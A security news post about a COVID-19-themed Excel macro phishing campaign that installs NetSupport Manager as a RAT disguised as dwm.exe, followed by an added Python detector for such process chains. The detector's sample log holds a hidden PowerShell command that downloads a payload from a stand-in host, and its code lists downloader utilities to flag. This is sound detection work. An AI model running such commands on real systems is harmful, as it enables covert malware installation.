Microsoft is warning of an ongoing COVID-19-themed phishing campaign, spread via malicious Excel attachments, that installs the NetSupport Manager remote administration tool.
The attack starts with emails pretending to come from the Johns Hopkins Centre, offering an update on the number of coronavirus-related deaths in the United States. The attached Excel document contains malicious macros and, once opened, prompts the user to ‘Enable Content’. If the user clicks, the macros execute and download and install the NetSupport Manager client from a remote site.
NetSupport Manager is a legitimate remote administration tool that is widely distributed in criminal communities for use as a remote access Trojan (RAT). In this campaign it masquerades as the legitimate Desktop Window Manager executable, so it is unlikely to look unusual to a user glancing at Task Manager. Once installed, it gives the threat actor complete control of the infected machine, including the ability to execute commands remotely; after some time, the NetSupport Manager RAT is used to further compromise the victim’s computer by installing additional tools and scripts. It is also possible that the threat actor used the infected machine to spread laterally throughout the network.
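The delivery chain above (Excel macro runs a downloader, the dropped client hides under the name of the Desktop Window Manager) leaves a recognisable trail in process-creation telemetry. The following is an added example, not code from the original article or from Microsoft's advisory: a small Python detector run over constructed, Sysmon-style process-creation records. The key=value log format, the sample lines, the file name covid-19-update.xls, the download URL and the assumption that the RAT is dropped under the name dwm.exe are all illustrative assumptions; what the page supports is only that the client masquerades as the Desktop Window Manager executable, whose genuine copy lives in C:\Windows\System32.

```python
"""Flag process-creation events consistent with an Office-macro RAT drop.

Added example, not from the original article.  The log format is a constructed
key=value layout loosely modelled on Sysmon Event ID 1 fields (Image,
ParentImage, CommandLine); the sample lines, paths and URL are made up.
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass

# The genuine Desktop Window Manager binary on a Windows host.
LEGIT_DWM_PATH = r"c:\windows\system32\dwm.exe"

# Office hosts whose children deserve scrutiny. Excel is the host used by this
# campaign; Word and PowerPoint are added here for generality.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Classic macro-stage downloaders/launchers.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

_FIELD = re.compile(r'(\w+)="([^"]*)"')


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed key="value" record into a ProcessEvent."""
    fields = dict(_FIELD.findall(line))
    return ProcessEvent(
        image=fields.get("Image", ""),
        parent_image=fields.get("ParentImage", ""),
        command_line=fields.get("CommandLine", ""),
    )


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def findings_for(ev: ProcessEvent) -> list[str]:
    """Return the detection hits for a single event (empty list if clean)."""
    hits: list[str] = []
    name, parent = _name(ev.image), _name(ev.parent_image)
    # Rule 1: something calling itself dwm.exe from anywhere but System32.
    if name == "dwm.exe" and ev.image.lower() != LEGIT_DWM_PATH:
        hits.append(f"dwm.exe masquerade: {ev.image}")
    # Rule 2: an Office host spawning a scripting or download utility,
    # the macro stage of the chain ("Enable Content" has just been clicked).
    if parent in OFFICE_HOSTS and name in SUSPICIOUS_CHILDREN:
        hits.append(f"{parent} spawned {name}: {ev.command_line}")
    return hits


def scan(lines: list[str]) -> list[tuple[int, str]]:
    """Run the rules over a log and return (line index, finding) pairs."""
    return [(i, hit) for i, line in enumerate(lines)
            for hit in findings_for(parse_event(line))]


# Constructed sample log: a benign DWM start, Excel opening the lure, the macro
# launching PowerShell, and the dropped client running from the user profile.
SAMPLE_LOG = [
    r'Image="C:\Windows\System32\dwm.exe" ParentImage="C:\Windows\System32\winlogon.exe" CommandLine="dwm.exe"',
    r'Image="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" ParentImage="C:\Windows\explorer.exe" CommandLine="EXCEL.EXE covid-19-update.xls"',
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" CommandLine="powershell -w hidden -c iwr http://example.invalid/u.bin -OutFile %APPDATA%\dwm.exe"',
    r'Image="C:\Users\alice\AppData\Roaming\dwm.exe" ParentImage="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="dwm.exe"',
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_LOG):
        print(f"line {idx}: {finding}")
```

Rule 1 is the one the Task Manager remark motivates: a user sees only the name, but telemetry records the full path, and the real Desktop Window Manager never runs from a user-writable directory. Rule 2 fires earlier in the chain and is worth keeping even when the dropped binary uses a different name.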
Anyone who was affected by this phishing campaign should operate under the assumption that their data has been compromised and that the threat actor attempted to steal their passwords.
Educate your employees with Security Awareness Training: they need to be taught about targeted phishing attacks, whether the lure is an email from a look-alike domain or a theme such as tax or flight refunds, COVID-19, an outstanding invoice, a package delivery, or any of the myriad other stories like the one above.
With thanks to the Cyber Defence Alliance and Bleeping Computer. The full story is here: https://www.bleepingcomputer.com/news/security/microsoft-warns-of-massive-phishing-attack-pushing-legit-rat/